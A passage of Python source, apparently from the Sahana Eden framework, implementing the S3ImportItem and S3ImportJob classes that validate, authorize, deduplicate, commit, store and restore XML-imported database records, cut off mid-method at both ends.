        _debug("New item: %s" % self)
        return True

    # -------------------------------------------------------------------------
    def deduplicate(self):
        """
            Detect whether this item updates an existing record: look
            up an original record, or run a custom deduplicator hook,
            and set id/uid/method accordingly
        """

        if self.id:
            # Already identified
            return

        table = self.table
        if table is None:
            return

        original = self.original
        if original is None:
            original = current.manager.original(table, self.data)

        if original is not None:
            # Found an existing record => this becomes an update
            self.original = original
            self.id = original[table._id.name]
            UID = current.xml.UID
            if UID in original:
                self.uid = original[UID]
                self.data.update({UID:self.uid})
            self.method = self.METHOD.UPDATE
        else:
            # Give a table-specific deduplicator a chance
            resolve = current.s3db.get_config(self.tablename, "deduplicate")
            if self.data and resolve:
                resolve(self)

        return

    # -------------------------------------------------------------------------
    def authorize(self):
        """
            Authorize the import of this item, sets self.permitted

            @returns: True if the import is permitted, else False
        """

        manager = current.manager
        permit = manager.permit

        self.permitted = False

        table = self.table
        if not table:
            return False

        # Never import into protected tables
        prefix = self.tablename.split("_", 1)[0]
        if prefix in manager.PROTECTED:
            return False

        # Without a permission handler, everything is permitted
        if not permit:
            self.permitted = True

        # Determine the actual import method
        self.method = self.METHOD.CREATE
        if self.id:
            if self.data.deleted is True:
                self.method = self.METHOD.DELETE
                self.accepted = True
            else:
                if not self.original:
                    query = (table.id == self.id)
                    self.original = current.db(query).select(limitby=(0, 1)
                                                             ).first()
                if self.original:
                    self.method = self.METHOD.UPDATE

        if self.method == self.METHOD.CREATE:
            self.id = 0

        # Check permission for the chosen method
        if permit:
            self.permitted = permit(self.method,
                                    self.tablename,
                                    record_id=self.id)

        return self.permitted

    # -------------------------------------------------------------------------
    def validate(self):
        """
            Validate this item (=record onvalidation), sets self.accepted

            @returns: True if accepted, else False
        """

        if self.accepted is not None:
            # Already validated
            return self.accepted
        if self.data is None or not self.table:
            self.accepted = False
            return False

        # Build a pseudo-form for the onvalidation callback
        form = Storage()
        form.method = self.method
        form.vars = self.data
        if self.id:
            form.vars.id = self.id
        form.errors = Storage()
        tablename = self.tablename
        # Method-specific onvalidation takes precedence over generic
        key = "%s_onvalidation" % self.method
        s3db = current.s3db
        onvalidation = s3db.get_config(tablename, key,
                       s3db.get_config(tablename, "onvalidation"))
        if onvalidation:
            try:
                callback(onvalidation, form, tablename=tablename)
            except:
                pass # @todo need a better handler here.
        self.accepted = True
        if form.errors:
            # Attach error messages to the matching source sub-elements
            error = current.xml.ATTRIBUTE.error
            for k in form.errors:
                e = self.element.findall("data[@field='%s']" % k)
                if not e:
                    e = self.element.findall("reference[@field='%s']" % k)
                if not e:
                    # No matching sub-element: attach to resource element
                    e = self.element
                    form.errors[k] = "[%s] %s" % (k, form.errors[k])
                else:
                    e = e[0]
                e.set(error,
                      str(form.errors[k]).decode("utf-8"))
            self.error = self.ERROR.VALIDATION_ERROR
            self.accepted = False
        return self.accepted

    # -------------------------------------------------------------------------
    def commit(self, ignore_errors=False):
        """
            Commit this item to the database

            @param ignore_errors: skip invalid components
                                  (still reports errors)

            @returns: True on success or skip, False on error
                      (unless ignore_errors is set)
        """

        db = current.db
        s3db = current.s3db
        xml = current.xml
        manager = current.manager
        table = self.table

        # Check if already committed
        if self.committed:
            # already committed
            return True

        # If the parent item gets skipped, then skip this item as well
        if self.parent is not None and self.parent.skip:
            return True

        _debug("Committing item %s" % self)

        # Resolve references
        self._resolve_references()

        # Validate
        if not self.validate():
            _debug("Validation error: %s (%s)" % (self.error, xml.tostring(self.element, pretty_print=True)))
            self.skip = True
            return ignore_errors

        elif self.components:
            for component in self.components:
                if not component.validate():
                    if hasattr(component, "tablename"):
                        tn = component.tablename
                    else:
                        tn = None
                    _debug("Validation error, component=%s" % tn)
                    component.skip = True
                    # Skip this item on any component validation errors
                    # unless ignore_errors is True
                    if ignore_errors:
                        continue
                    else:
                        self.skip = True
                        return False

        # De-duplicate
        self.deduplicate()

        # Log this item
        if manager.log is not None:
            manager.log(self)

        # Authorize item
        if not self.authorize():
            _debug("Not authorized - skip")
            self.error = manager.ERROR.NOT_PERMITTED
            self.skip = True
            return ignore_errors

        _debug("Method: %s" % self.method)

        # Check if import method is allowed in strategy
        if not isinstance(self.strategy, (list, tuple)):
            self.strategy = [self.strategy]
        if self.method not in self.strategy:
            _debug("Method not in strategy - skip")
            self.error = manager.ERROR.NOT_PERMITTED
            self.skip = True
            return True

        # Load the original record (for update/delete)
        this = self.original
        if not this and self.id and \
           self.method in (self.METHOD.UPDATE, self.METHOD.DELETE):
            query = (table.id == self.id)
            this = db(query).select(limitby=(0, 1)).first()
        this_mtime = None
        this_mci = 0
        if this:
            if xml.MTIME in table.fields:
                this_mtime = xml.as_utc(this[xml.MTIME])
            if xml.MCI in table.fields:
                this_mci = this[xml.MCI]
        self.mtime = xml.as_utc(self.mtime)

        # Conflict detection
        this_modified = True
        self.modified = True
        self.conflict = False
        last_sync = xml.as_utc(self.job.last_sync)
        if last_sync:
            if this_mtime and this_mtime < last_sync:
                this_modified = False
            if self.mtime and self.mtime < last_sync:
                self.modified = False
            if self.modified and this_modified:
                self.conflict = True

        if self.conflict and \
           self.method in (self.METHOD.UPDATE, self.METHOD.DELETE):
            _debug("Conflict: %s" % self)
            if self.job.onconflict:
                self.job.onconflict(self)

        if self.data is not None:
            data = Storage(self.data)
        else:
            data = Storage()

        # Update existing record
        if self.method == self.METHOD.UPDATE:

            if this:
                if "deleted" in this and this.deleted:
                    policy = self._get_update_policy(None)
                    if policy == self.POLICY.NEWER and \
                       this_mtime and this_mtime > self.mtime or \
                       policy == self.POLICY.MASTER and \
                       (this_mci == 0 or self.mci != 1):
                        self.skip = True
                        return True
                # Iterate over a snapshot of the keys: fields may get
                # deleted from data inside the loop
                fields = list(data.keys())
                for f in fields:
                    if f not in this:
                        continue
                    if isinstance(this[f], datetime):
                        if xml.as_utc(data[f]) == xml.as_utc(this[f]):
                            del data[f]
                            continue
                    else:
                        if data[f] == this[f]:
                            del data[f]
                            continue
                    remove = False
                    policy = self._get_update_policy(f)
                    if policy == self.POLICY.THIS:
                        remove = True
                    elif policy == self.POLICY.NEWER:
                        if this_mtime and this_mtime > self.mtime:
                            remove = True
                    elif policy == self.POLICY.MASTER:
                        if this_mci == 0 or self.mci != 1:
                            remove = True
                    if remove:
                        del data[f]
                        self.data.update({f:this[f]})
                if "deleted" in this and this.deleted:
                    # Undelete re-imported records:
                    data.update(deleted=False)
                    if "deleted_fk" in table:
                        data.update(deleted_fk="")
                    if "created_by" in table:
                        data.update(created_by=table.created_by.default)
                    if "modified_by" in table:
                        data.update(modified_by=table.modified_by.default)

            if not self.skip and not self.conflict and \
               (len(data) or self.components or self.references):
                if self.uid and xml.UID in table:
                    data.update({xml.UID:self.uid})
                if xml.MTIME in table:
                    data.update({xml.MTIME: self.mtime})
                if xml.MCI in data:
                    # retain local MCI on updates
                    del data[xml.MCI]
                query = (table._id == self.id)
                try:
                    success = db(query).update(**dict(data))
                except:
                    self.error = sys.exc_info()[1]
                    self.skip = True
                    return False
                if success:
                    self.committed = True
            else:
                # Nothing to update
                self.committed = True

        # Create new record
        elif self.method == self.METHOD.CREATE:

            # Do not apply field policy to UID and MCI
            UID = xml.UID
            if UID in data:
                del data[UID]
            MCI = xml.MCI
            if MCI in data:
                del data[MCI]

            # FIX: iterate over a snapshot of the keys - the original
            # code iterated the dict directly while deleting from it,
            # which raises RuntimeError ("dictionary changed size
            # during iteration") whenever the MASTER policy applies
            for f in list(data.keys()):
                policy = self._get_update_policy(f)
                if policy == self.POLICY.MASTER and self.mci != 1:
                    del data[f]

            if len(data) or self.components or self.references:

                # Restore UID and MCI
                if self.uid and UID in table.fields:
                    data.update({UID:self.uid})
                if MCI in table.fields:
                    data.update({MCI:self.mci})

                # Insert the new record
                try:
                    success = table.insert(**dict(data))
                except:
                    self.error = sys.exc_info()[1]
                    self.skip = True
                    return False
                if success:
                    self.id = success
                    self.committed = True

            else:
                # Nothing to create
                self.skip = True
                return True

        # Delete local record
        elif self.method == self.METHOD.DELETE:

            if this:
                if this.deleted:
                    self.skip = True
                policy = self._get_update_policy(None)
                if policy == self.POLICY.THIS:
                    self.skip = True
                elif policy == self.POLICY.NEWER and \
                     (this_mtime and this_mtime > self.mtime):
                    self.skip = True
                elif policy == self.POLICY.MASTER and \
                     (this_mci == 0 or self.mci != 1):
                    self.skip = True
            else:
                self.skip = True

            if not self.skip and not self.conflict:

                prefix, name = self.tablename.split("_", 1)
                resource = manager.define_resource(prefix, name, id=self.id)

                ondelete = s3db.get_config(self.tablename, "ondelete")
                success = resource.delete(ondelete=ondelete,
                                          cascade=True)
                if resource.error:
                    self.error = resource.error
                    self.skip = True
                    return ignore_errors

            _debug("Success: %s, id=%s %sd" % (self.tablename, self.id,
                                               self.skip and "skippe" or \
                                               self.method))
            return True

        # Audit + onaccept on successful commits
        if self.committed:
            form = Storage()
            form.method = self.method
            form.vars = self.data
            tablename = self.tablename
            prefix, name = tablename.split("_", 1)
            if self.id:
                form.vars.id = self.id
            if manager.audit is not None:
                manager.audit(self.method, prefix, name,
                              form=form,
                              record=self.id,
                              representation="xml")
            s3db.update_super(table, form.vars)
            if self.method == self.METHOD.CREATE:
                current.auth.s3_set_record_owner(table, self.id)
            key = "%s_onaccept" % self.method
            onaccept = s3db.get_config(tablename, key,
                       s3db.get_config(tablename, "onaccept"))
            if onaccept:
                callback(onaccept, form, tablename=self.tablename)

        # Update referencing items
        if self.update and self.id:
            for u in self.update:
                item = u.get("item", None)
                if not item:
                    continue
                field = u.get("field", None)
                if isinstance(field, (list, tuple)):
                    pkey, fkey = field
                    query = table.id == self.id
                    row = db(query).select(table[pkey],
                                           limitby=(0, 1)).first()
                    if row:
                        item._update_reference(fkey, row[pkey])
                else:
                    item._update_reference(field, self.id)

        _debug("Success: %s, id=%s %sd" % (self.tablename, self.id,
                                           self.skip and "skippe" or \
                                           self.method))
        return True

    # -------------------------------------------------------------------------
    def _get_update_policy(self, field):
        """
            Get the update policy for a field (if the item will
            update an existing record)

            @param field: the name of the field

            @returns: one of the POLICY values; falls back to
                      POLICY.THIS if no valid policy is configured
        """

        policy = self.update_policy
        if isinstance(policy, dict):
            # Per-field policy dict, with optional "__default__" key
            r = policy.get(field,
                policy.get("__default__", self.POLICY.THIS))
        else:
            r = policy
        if r not in self.POLICY.values():
            r = self.POLICY.THIS
        return r

    # -------------------------------------------------------------------------
    def _resolve_references(self):
        """
            Resolve the references of this item (=look up all foreign
            keys from other items of the same job). If a foreign key
            is not yet available, it will be scheduled for later update.
        """

        if not self.table:
            return

        items = self.job.items
        for reference in self.references:

            item = None
            field = reference.field
            entry = reference.entry
            if not entry:
                continue

            # Resolve key tuples
            if isinstance(field, (list,tuple)):
                pkey, fkey = field
            else:
                pkey, fkey = ("id", field)

            # Resolve the key table name
            ktablename, key, multiple = s3_get_foreign_key(self.table[fkey])
            if not ktablename:
                if self.tablename == "auth_user" and \
                   fkey == "organisation_id":
                    # Special case: organisation_id in auth_user has no
                    # regular foreign key constraint
                    ktablename = "org_organisation"
                else:
                    continue
            if entry.tablename:
                # The entry may override the key table name
                ktablename = entry.tablename
            try:
                ktable = current.s3db[ktablename]
            except:
                # Key table not defined => cannot resolve this reference
                continue

            # Resolve the foreign key (value)
            fk = entry.id
            if entry.item_id:
                # Reference points to another item of this job, which
                # may already have a record ID
                item = items[entry.item_id]
                if item:
                    fk = item.id
            if fk and pkey != "id":
                # Alternate primary key: look up its value from the record
                row = current.db(ktable._id == fk).select(ktable[pkey],
                                                          limitby=(0, 1)).first()
                if not row:
                    fk = None
                    continue
                else:
                    fk = row[pkey]

            # Update record data
            if fk:
                if multiple:
                    # list:reference - append to the list if not present
                    val = self.data.get(fkey, [])
                    if fk not in val:
                        val.append(fk)
                    self.data[fkey] = val
                else:
                    self.data[fkey] = fk
            else:
                # Foreign key not (yet) available
                if fkey in self.data and not multiple:
                    del self.data[fkey]
                if item:
                    # Schedule for writeback after the referenced item
                    # has been committed (circular reference)
                    item.update.append(dict(item=self, field=fkey))

    # -------------------------------------------------------------------------
    def _update_reference(self, field, value):
        """
            Helper method to update a foreign key in an already written
            record. Will be called by the referenced item after (and only
            if) it has been committed. This is only needed if the reference
            could not be resolved before commit due to circular references.

            @param field: the field name of the foreign key
            @param value: the value of the foreign key
        """

        table = self.table
        if not value or not table:
            return
        if not (self.id and self.permitted):
            return

        db = current.db
        fieldtype = str(table[field].type)
        if fieldtype.startswith("list:reference"):
            # Multi-reference: append the value to the list
            query = (table.id == self.id)
            record = db(query).select(table[field],
                                      limitby=(0, 1)).first()
            if not record:
                return
            values = record[field]
            if value not in values:
                values.append(value)
                db(table.id == self.id).update(**{field:values})
        else:
            # Single reference: write the value directly
            db(table.id == self.id).update(**{field:value})

    # -------------------------------------------------------------------------
    def store(self, item_table=None):
        """
            Store this item in the DB

            @param item_table: the item table
            @returns: the record ID of the stored item, or None if no
                      item table was given
        """

        _debug("Storing item %s" % self)

        if item_table is None:
            return None

        db = current.db

        # Is there already a stored record for this item?
        existing = db(item_table.item_id == self.item_id) \
                     .select(item_table.id, limitby=(0, 1)).first()
        record_id = existing.id if existing else None

        record = Storage(job_id = self.job.job_id,
                         item_id = self.item_id,
                         tablename = self.tablename,
                         record_uid = self.uid,
                         error = self.error)

        # Serialize the source element
        if self.element is not None:
            record.update(element=current.xml.tostring(self.element,
                                                       xml_declaration=False))

        # Pickle the record data, skipping the record ID and any
        # foreign keys (references are stored separately below)
        if self.data is not None:
            table = self.table
            data = Storage()
            for f in self.data.keys():
                if f not in table.fields:
                    continue
                fieldtype = str(self.table[f].type)
                if fieldtype == "id" or s3_has_foreign_key(self.table[f]):
                    continue
                data[f] = self.data[f]
            record.update(data=cPickle.dumps(data))

        # Encode the references as JSON strings, either by item ID
        # (reference within the same job) or by tablename/UID
        ritems = []
        for reference in self.references:
            entry = reference.entry
            if not entry:
                continue
            if entry.item_id is not None:
                ritem = dict(field=reference.field,
                             item_id=str(entry.item_id))
            elif entry.uid is not None:
                ritem = dict(field=reference.field,
                             tablename=entry.tablename,
                             uid=str(entry.uid))
            else:
                continue
            ritems.append(json.dumps(ritem))
        if ritems:
            record.update(ritems=ritems)

        # Component and parent links (by item ID)
        citems = [c.item_id for c in self.components]
        if citems:
            record.update(citems=citems)
        if self.parent:
            record.update(parent=self.parent.item_id)

        # Insert or update the item record
        if record_id:
            db(item_table.id == record_id).update(**record)
        else:
            record_id = item_table.insert(**record)

        _debug("Record ID=%s" % record_id)
        return record_id

    # -------------------------------------------------------------------------
    def restore(self, row):
        """
            Restore an item from a item table row. This does not restore
            the references (since this can not be done before all items
            are restored), must call job.restore_references() to do that

            @param row: the item table row
            @returns: True on success, False if the target resource is
                      unknown or the stored item had a validation error
        """

        xml = current.xml

        self.item_id = row.item_id
        # Reset the processing state: the restored item has not been
        # re-authorized or committed yet in this run
        self.accepted = None
        self.permitted = False
        self.committed = False
        tablename = row.tablename
        self.id = None
        self.uid = row.record_uid
        # Un-pickle the record data (pickled by store())
        if row.data is not None:
            self.data = cPickle.loads(row.data)
        else:
            self.data = Storage()
        data = self.data
        # Restore synchronization meta-data from the record data
        if xml.MTIME in data:
            self.mtime = data[xml.MTIME]
        if xml.MCI in data:
            self.mci = data[xml.MCI]
        UID = xml.UID
        if UID in data:
            self.uid = data[UID]
        # NOTE(review): assumes row.element is never None — store() only
        # writes the element when the item had one; confirm that items
        # are never stored without an element
        self.element = etree.fromstring(row.element)
        # Component/reference/parent links are restored later by
        # job.restore_references(), so only remember them here
        if row.citems:
            self.load_components = row.citems
        if row.ritems:
            self.load_references = [json.loads(ritem) for ritem in row.ritems]
        self.load_parent = row.parent
        try:
            table = current.s3db[tablename]
        except:
            self.error = self.ERROR.BAD_RESOURCE
            return False
        else:
            self.table = table
            self.tablename = tablename
        # Look up the original DB record (if any) to detect updates
        original = current.manager.original(table, self.data)
        if original is not None:
            self.original = original
            self.id = original[table._id.name]
            if UID in original:
                self.uid = original[UID]
                self.data.update({UID:self.uid})
        self.error = row.error
        if self.error and not self.data:
            # Validation error
            return False
        return True

# =============================================================================
class S3ImportJob():
    """
        Class to import an element tree into the database
    """

    JOB_TABLE_NAME = "s3_import_job"
    ITEM_TABLE_NAME = "s3_import_item"

    # -------------------------------------------------------------------------
    def __init__(self, manager, table,
                 tree=None,
                 files=None,
                 job_id=None,
                 strategy=None,
                 update_policy=None,
                 conflict_policy=None,
                 last_sync=None,
                 onconflict=None):
        """
            Constructor

            @param manager: the S3RequestManager instance performing this job
            @param tree: the element tree to import
            @param files: files attached to the import (for upload fields)
            @param job_id: restore job from database (record ID or job_id)
            @param strategy: the import strategy
            @param update_policy: the update policy
            @param conflict_policy: the conflict resolution policy
            @param last_sync: the last synchronization time stamp (datetime)
            @param onconflict: custom conflict resolver function
        """

        self.error = None # the last error
        self.error_tree = etree.Element(current.xml.TAG.root)

        self.table = table
        self.tree = tree
        self.files = files
        self.directory = Storage()

        # Lookup maps: element -> item_id and item_id -> item
        self.elements = Storage()
        self.items = Storage()
        self.references = []

        self.job_table = None
        self.item_table = None

        self.count = 0 # total number of records imported
        self.created = [] # IDs of created records
        self.updated = [] # IDs of updated records
        self.deleted = [] # IDs of deleted records

        # Import strategy
        self.strategy = strategy
        if self.strategy is None:
            self.strategy = [S3ImportItem.METHOD.CREATE,
                             S3ImportItem.METHOD.UPDATE,
                             S3ImportItem.METHOD.DELETE]
        if not isinstance(self.strategy, (tuple, list)):
            self.strategy = [self.strategy]

        # Update policy (default=always update)
        self.update_policy = update_policy
        if not self.update_policy:
            self.update_policy = S3ImportItem.POLICY.OTHER
        # Conflict resolution policy (default=always update)
        self.conflict_policy = conflict_policy
        if not self.conflict_policy:
            self.conflict_policy = S3ImportItem.POLICY.OTHER

        # Synchronization settings
        self.mtime = None
        self.last_sync = last_sync
        self.onconflict = onconflict

        if job_id:
            # Restore the job from the database
            self.__define_tables()
            jobtable = self.job_table
            if str(job_id).isdigit():
                query = jobtable.id == job_id
            else:
                query = jobtable.job_id == job_id
            row = current.db(query).select(limitby=(0, 1)).first()
            if not row:
                raise SyntaxError("Job record not found")
            self.job_id = row.job_id
            if not self.table:
                tablename = row.tablename
                try:
                    table = current.s3db[tablename]
                except:
                    pass
                else:
                    # Fix: adopt the looked-up table (previously the result
                    # was discarded and self.table stayed None)
                    self.table = table
        else:
            import uuid
            self.job_id = uuid.uuid4() # unique ID for this job

    # -------------------------------------------------------------------------
    def add_item(self,
                 element=None,
                 original=None,
                 components=None,
                 parent=None,
                 joinby=None):
        """
            Parse and validate an XML element and add it as new item
            to the job.

            @param element: the element
            @param original: the original DB record (if already available,
                             will otherwise be looked-up by this function)
            @param components: a dictionary of components (as in S3Resource)
                               to include in the job (defaults to all
                               defined components)
            @param parent: the parent item (if this is a component)
            @param joinby: the component join key(s) (if this is a component)

            @returns: a unique identifier for the new item; self.error
                      contains the last error, and self.error_tree an
                      element tree with all failing elements including
                      error attributes.
        """

        if element in self.elements:
            # element has already been added to this job
            return self.elements[element]

        # Parse the main element
        item = S3ImportItem(self)

        # Update lookup lists
        item_id = item.item_id
        self.items[item_id] = item
        if element is not None:
            self.elements[element] = item_id

        if not item.parse(element,
                          original=original,
                          files=self.files):
            # Parsing/validation failed: record the error; only top-level
            # elements go into the error tree (components are appended
            # through their parent)
            self.error = item.error
            item.accepted = False
            if parent is None:
                self.error_tree.append(deepcopy(item.element))

        else:
            # Now parse the components
            table = item.table
            components = current.s3db.get_components(table, names=components)

            # Build two lookup maps for component elements:
            # cnames: component tablename -> list of aliases
            # cinfos: (tablename, alias) -> join/lookup info
            cnames = Storage()
            cinfos = Storage()
            for alias in components:
                component = components[alias]
                pkey = component.pkey
                if component.linktable:
                    # For link-table components, import into the link table
                    ctable = component.linktable
                    fkey = component.lkey
                else:
                    ctable = component.table
                    fkey = component.fkey
                ctablename = ctable._tablename
                if ctablename in cnames:
                    cnames[ctablename].append(alias)
                else:
                    cnames[ctablename] = [alias]
                cinfos[(ctablename, alias)] = Storage(component = component,
                                                      ctable = ctable,
                                                      pkey = pkey,
                                                      fkey = fkey,
                                                      original = None,
                                                      uid = None)
            add_item = self.add_item
            xml = current.xml
            for celement in xml.components(element, names=cnames.keys()):

                # Get the component tablename
                ctablename = celement.get(xml.ATTRIBUTE.name, None)
                if not ctablename:
                    continue

                # Get the component alias (for disambiguation)
                calias = celement.get(xml.ATTRIBUTE.alias, None)
                if calias is None:
                    if ctablename not in cnames:
                        continue
                    aliases = cnames[ctablename]
                    if len(aliases) == 1:
                        calias = aliases[0]
                    else:
                        # ambiguous components *must* use alias
                        continue
                if (ctablename, calias) not in cinfos:
                    continue
                else:
                    cinfo = cinfos[(ctablename, calias)]

                component = cinfo.component
                original = cinfo.original
                ctable = cinfo.ctable
                pkey = cinfo.pkey
                fkey = cinfo.fkey
                if not component.multiple:
                    # Single-component: only import the first element,
                    # and resolve the original record to force an update
                    if cinfo.uid is not None:
                        continue
                    if original is None and item.id:
                        query = (table.id == item.id) & \
                                (table[pkey] == ctable[fkey])
                        original = current.db(query).select(ctable.ALL,
                                                            limitby=(0, 1)).first()
                    if original:
                        cinfo.uid = uid = original.get(xml.UID, None)
                        celement.set(xml.UID, uid)
                    cinfo.original = original

                # Recurse into the component element
                item_id = add_item(element=celement,
                                   original=original,
                                   parent=item,
                                   joinby=(pkey, fkey))
                if item_id is None:
                    item.error = self.error
                    self.error_tree.append(deepcopy(item.element))
                else:
                    citem = self.items[item_id]
                    citem.parent = item
                    item.components.append(citem)

            # Handle references
            table = item.table
            tree = self.tree
            if tree is not None:
                fields = [table[f] for f in table.fields]
                rfields = filter(s3_has_foreign_key, fields)
                item.references = self.lookahead(element,
                                                 table=table,
                                                 fields=rfields,
                                                 tree=tree,
                                                 directory=self.directory)
                # Add the referenced elements to the job as well
                for reference in item.references:
                    entry = reference.entry
                    if entry and entry.element is not None:
                        item_id = add_item(element=entry.element)
                        if item_id:
                            entry.update(item_id=item_id)

            # Parent reference
            if parent is not None:
                entry = Storage(item_id=parent.item_id,
                                element=parent.element,
                                tablename=parent.tablename)
                item.references.append(Storage(field=joinby,
                                               entry=entry))

        return item.item_id

    # -------------------------------------------------------------------------
    def lookahead(self,
                  element,
                  table=None,
                  fields=None,
                  tree=None,
                  directory=None):
        """
            Find referenced elements in the tree

            @param element: the element
            @param table: the DB table
            @param fields: the FK fields in the table
            @param tree: the import tree
            @param directory: a dictionary to lookup elements in the tree
                              (will be filled in by this function)

            @returns: a list of Storage(field=..., entry=...) references
        """

        db = current.db
        s3db = current.s3db
        xml = current.xml
        import_uid = xml.import_uid
        ATTRIBUTE = xml.ATTRIBUTE
        TAG = xml.TAG
        UID = xml.UID
        reference_list = []

        root = None
        if tree is not None:
            if isinstance(tree, etree._Element):
                root = tree
            else:
                root = tree.getroot()
        references = element.findall("reference")
        for reference in references:
            field = reference.get(ATTRIBUTE.field, None)
            # Ignore references without valid field-attribute
            if not field or field not in fields:
                continue
            # Find the key table
            multiple = False
            fieldtype = str(table[field].type)
            if fieldtype.startswith("reference"):
                # strip the "reference " prefix
                ktablename = fieldtype[10:]
            elif fieldtype.startswith("list:reference"):
                # strip the "list:reference " prefix
                ktablename = fieldtype[15:]
                multiple = True
            else:
                # ignore if the field is not a reference type
                continue
            try:
                ktable = s3db[ktablename]
            except:
                # Invalid tablename - skip
                continue
            tablename = reference.get(ATTRIBUTE.resource, None)
            # Ignore references to tables without UID field:
            if UID not in ktable.fields:
                continue
            # Fall back to key table name if tablename is not specified:
            if not tablename:
                tablename = ktablename
            # Super-entity references must use the super-key:
            if tablename != ktablename:
                field = (ktable._id.name, field)
            # Ignore direct references to super-entities:
            if tablename == ktablename and ktable._id.name != "id":
                continue
            # Get the foreign key
            uids = reference.get(UID, None)
            attr = UID
            if not uids:
                uids = reference.get(ATTRIBUTE.tuid, None)
                attr = ATTRIBUTE.tuid
            if uids and multiple:
                uids = json.loads(uids)
            elif uids:
                uids = [uids]

            # Find the elements and map to DB records
            relements = []

            # Create a UID<->ID map
            id_map = Storage()
            if attr == UID and uids:
                _uids = map(import_uid, uids)
                query = ktable[UID].belongs(_uids)
                records = db(query).select(ktable.id,
                                           ktable[UID])
                id_map = dict([(r[UID], r.id) for r in records])

            if not uids:
                # Anonymous reference: <resource> inside the element
                expr = './/%s[@%s="%s"]' % (TAG.resource,
                                            ATTRIBUTE.name,
                                            tablename)
                relements = reference.xpath(expr)
                if relements and not multiple:
                    relements = [relements[0]]

            elif root is not None:

                for uid in uids:

                    entry = None
                    # Entry already in directory?
                    if directory is not None:
                        entry = directory.get((tablename, attr, uid), None)
                    if not entry:
                        expr = ".//%s[@%s='%s' and @%s='%s']" % (
                                    TAG.resource,
                                    ATTRIBUTE.name,
                                    tablename,
                                    attr,
                                    uid)
                        e = root.xpath(expr)
                        if e:
                            # Element in the source => append to relements
                            relements.append(e[0])
                        else:
                            # No element found, see if original record exists
                            _uid = import_uid(uid)
                            if _uid and _uid in id_map:
                                _id = id_map[_uid]
                                entry = Storage(tablename=tablename,
                                                element=None,
                                                uid=uid,
                                                id=_id,
                                                item_id=None)
                                reference_list.append(Storage(field=field,
                                                              entry=entry))
                            else:
                                continue
                    else:
                        reference_list.append(Storage(field=field,
                                                      entry=entry))

            # Create entries for all newly found elements
            for relement in relements:
                uid = relement.get(attr, None)
                if attr == UID:
                    _uid = import_uid(uid)
                    id = _uid and id_map and id_map.get(_uid, None) or None
                else:
                    _uid = None
                    id = None
                entry = Storage(tablename=tablename,
                                element=relement,
                                uid=uid,
                                id=id,
                                item_id=None)
                # Add entry to directory
                if uid and directory is not None:
                    directory[(tablename, attr, uid)] = entry
                # Append the entry to the reference list
                reference_list.append(Storage(field=field, entry=entry))

        return reference_list

    # -------------------------------------------------------------------------
    def load_item(self, row):
        """
            Load an item from the item table (counterpart to add_item
            when restoring a job from the database)

            @param row: the item table row
            @returns: the unique identifier of the loaded item
        """

        item = S3ImportItem(self)
        if not item.restore(row):
            self.error = item.error
            if item.load_parent is None:
                self.error_tree.append(deepcopy(item.element))
        # Update lookup lists
        item_id = item.item_id
        self.items[item_id] = item
        return item_id

    # -------------------------------------------------------------------------
    def resolve(self, item_id, import_list):
        """
            Resolve the reference list of an item

            @param item_id: the import item UID
            @param import_list: the ordered list of items (UIDs) to import
        """

        item = self.items[item_id]
        if item.lock or item.accepted is False:
            return False
        # Collect the referenced items not yet scheduled for import
        references = []
        for reference in item.references:
            ritem_id = reference.entry.item_id
            if ritem_id and ritem_id not in import_list:
                references.append(ritem_id)
        # Schedule them first; the lock breaks circular references
        for ritem_id in references:
            item.lock = True
            if self.resolve(ritem_id, import_list):
                import_list.append(ritem_id)
            item.lock = False
        return True

    # -------------------------------------------------------------------------
    def commit(self, ignore_errors=False):
        """
            Commit the import job to the DB

            @param ignore_errors: skip any items with errors
                                  (does still report the errors)
        """

        ATTRIBUTE = current.xml.ATTRIBUTE

        # Resolve references
        import_list = []
        for item_id in self.items:
            self.resolve(item_id, import_list)
            if item_id not in import_list:
                import_list.append(item_id)
        # Commit the items
        items = self.items
        count = 0
        mtime = None
        created = []
        cappend = created.append
        updated = []
        deleted = []
        tablename = self.table._tablename
        for item_id in import_list:
            item = items[item_id]
            error = None
            success = item.commit(ignore_errors=ignore_errors)
            error = item.error
            if error:
                self.error = error
                element = item.element
                if element is not None:
                    # Tag the element with the error (unless already tagged)
                    if not element.get(ATTRIBUTE.error, False):
                        element.set(ATTRIBUTE.error, str(self.error))
                    self.error_tree.append(deepcopy(element))
                if not ignore_errors:
                    return False
            elif item.tablename == tablename:
                # Count only items of the main table, and track the
                # latest modification time of the committed records
                count += 1
                if mtime is None or item.mtime > mtime:
                    mtime = item.mtime
                if item.id:
                    if item.method == item.METHOD.CREATE:
                        cappend(item.id)
                    elif item.method == item.METHOD.UPDATE:
                        updated.append(item.id)
                    elif item.method == item.METHOD.DELETE:
                        deleted.append(item.id)
        self.count = count
        self.mtime = mtime
        self.created = created
        self.updated = updated
        self.deleted = deleted
        return True

    # -------------------------------------------------------------------------
    def __define_tables(self):
        """
            Define the database tables for jobs and items
        """

        self.job_table = self.define_job_table()
        self.item_table = self.define_item_table()

    # -------------------------------------------------------------------------
    @classmethod
    def define_job_table(cls):
        """
            Define (or look up) the job table
        """

        db = current.db
        if cls.JOB_TABLE_NAME not in db:
            # Fix: pass the callable (not datetime.utcnow()) so the
            # default is evaluated per-insert rather than once at
            # table-definition time
            job_table = db.define_table(cls.JOB_TABLE_NAME,
                                        Field("job_id", length=128,
                                              unique=True,
                                              notnull=True),
                                        Field("tablename"),
                                        Field("timestmp", "datetime",
                                              default=datetime.utcnow))
        else:
            job_table = db[cls.JOB_TABLE_NAME]
        return job_table

    # -------------------------------------------------------------------------
    @classmethod
    def define_item_table(cls):
        """
            Define (or look up) the item table
        """

        db = current.db
        if cls.ITEM_TABLE_NAME not in db:
            item_table = db.define_table(cls.ITEM_TABLE_NAME,
                                         Field("item_id", length=128,
                                               unique=True,
                                               notnull=True),
                                         Field("job_id", length=128),
                                         Field("tablename", length=128),
                                         #Field("record_id", "integer"),
                                         Field("record_uid"),
                                         Field("error", "text"),
                                         Field("data", "text"),
                                         Field("element", "text"),
                                         Field("ritems", "list:string"),
                                         Field("citems", "list:string"),
                                         Field("parent", length=128))
        else:
            item_table = db[cls.ITEM_TABLE_NAME]
        return item_table

    # -------------------------------------------------------------------------
    def store(self):
        """
            Store this job and all its items in the job table
        """

        db = current.db

        _debug("Storing Job ID=%s" % self.job_id)
        self.__define_tables()
        jobtable = self.job_table
        query = jobtable.job_id == self.job_id
        row = db(query).select(jobtable.id, limitby=(0, 1)).first()
        if row:
            record_id = row.id
        else:
            record_id = None
        record = Storage(job_id=self.job_id)
        try:
            tablename = self.table._tablename
        except:
            # No table set for this job - store without tablename
